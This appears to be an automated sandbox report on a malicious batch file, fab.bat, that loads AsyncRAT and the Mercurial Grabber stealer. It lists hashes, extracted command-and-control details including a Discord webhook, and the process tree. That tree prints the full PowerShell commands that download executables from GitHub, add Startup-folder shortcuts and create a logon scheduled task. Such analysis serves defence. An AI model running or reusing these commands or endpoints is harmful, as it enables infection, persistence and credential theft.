Analysis

  • max time kernel
    1050s
  • max time network
    1052s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 01:09

General

  • Target

    fab.bat

  • Size

    1KB

  • MD5

    f3f83ae17a3f81e0265b9ce7e480bd4e

  • SHA1

    994d8d5b533fd09630b45a0d0404f65557e83d5d

  • SHA256

    412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

  • SHA512

    cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

  • Mercurialgrabber family
  • Async RAT payload 1 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fab.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3300
    • C:\Users\Admin\Desktop\output.exe
      C:\Users\Admin\Desktop\output.exe
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Maps connected drives based on registry
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      PID:5064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4564
    • C:\Users\Admin\Desktop\Loader.exe
      C:\Users\Admin\Desktop\Loader.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:960
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4124
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBFD5.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4864
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:1540
        • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
          "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4228

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    a2b24af1492f112d2e53cb7415fda39f

    SHA1

    dbfcee57242a14b60997bd03379cc60198976d85

    SHA256

    fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

    SHA512

    9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    584d22b5c20db5b7ce671d0f1c552a50

    SHA1

    b9e6ad8174c29959aa2f9a680f7f5936d0775fb9

    SHA256

    8c39c5fd69dad8f0149514f44aca66bb4dd3ed78ec9cd2e8601342b4fd8ae2a4

    SHA512

    7446dfc78a24cdbc64f0ca73a9e1f7165a8480c399639dd08d88253b42d9d569b0b258df4b94186fc988f835752311f85218db0d1ea53e300e657780f8f4c399

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f54bb97620534dd95a2ea0320201f0ea

    SHA1

    437f442bfb37137260c0bde6b0f6e3e832737852

    SHA256

    fff6ee24ae8bcdd3214dc0416d8b5a190555069b7429a786637fe5a3d6421d1a

    SHA512

    57274884ec951a30976b8136c17b0be176b6c7fbe989d7b3a8f93b9553299179701ceeda72b812b7c3c4ab501c32d998e54e48ae162dd28387b0dd64fd5c6739

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qypkttc0.ypc.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmpBFD5.tmp.bat

    Filesize

    151B

    MD5

    bd4f33795e6bacbf6cda9acb17217680

    SHA1

    2161a2f8bdb0cda2f0747306328f37de7a77a9a5

    SHA256

    a0d6d6c7a5e8765a2cae6d9cf0234e737bf68d62ed7debccbc16a34f17c87beb

    SHA512

    5bf0508dcaec27006cebaca0a498d883435381ee8e93de6afdc77adade9d837a82d563c6cc9e0261c2607c0cfbb921d0fa3beb6d526e3176aa8c17aaddca3241

  • C:\Users\Admin\Desktop\Loader.exe

    Filesize

    63KB

    MD5

    7ceb11ebb7a55e33a82bc3b66f554e79

    SHA1

    8dfd574ad06ded662d92d81b72f14c1914ac45b5

    SHA256

    aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

    SHA512

    d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

  • C:\Users\Admin\Desktop\output.exe

    Filesize

    41KB

    MD5

    a0e598ec98a975405420be1aadaa3c2a

    SHA1

    d861788839cfb78b5203686334c1104165ea0937

    SHA256

    e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

    SHA512

    e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

  • memory/960-63-0x0000000000790000-0x00000000007A6000-memory.dmp

    Filesize

    88KB

  • memory/3300-30-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/3300-19-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/3300-34-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/3300-18-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/4228-74-0x000000001C240000-0x000000001C2B6000-memory.dmp

    Filesize

    472KB

  • memory/4228-75-0x0000000003060000-0x0000000003094000-memory.dmp

    Filesize

    208KB

  • memory/4228-76-0x0000000003090000-0x00000000030AE000-memory.dmp

    Filesize

    120KB

  • memory/5016-0-0x00007FF974D63000-0x00007FF974D65000-memory.dmp

    Filesize

    8KB

  • memory/5016-16-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/5016-12-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/5016-11-0x00007FF974D60000-0x00007FF975821000-memory.dmp

    Filesize

    10.8MB

  • memory/5016-6-0x000001DD1BFB0000-0x000001DD1BFD2000-memory.dmp

    Filesize

    136KB

  • memory/5064-36-0x00000000000E0000-0x00000000000F0000-memory.dmp

    Filesize

    64KB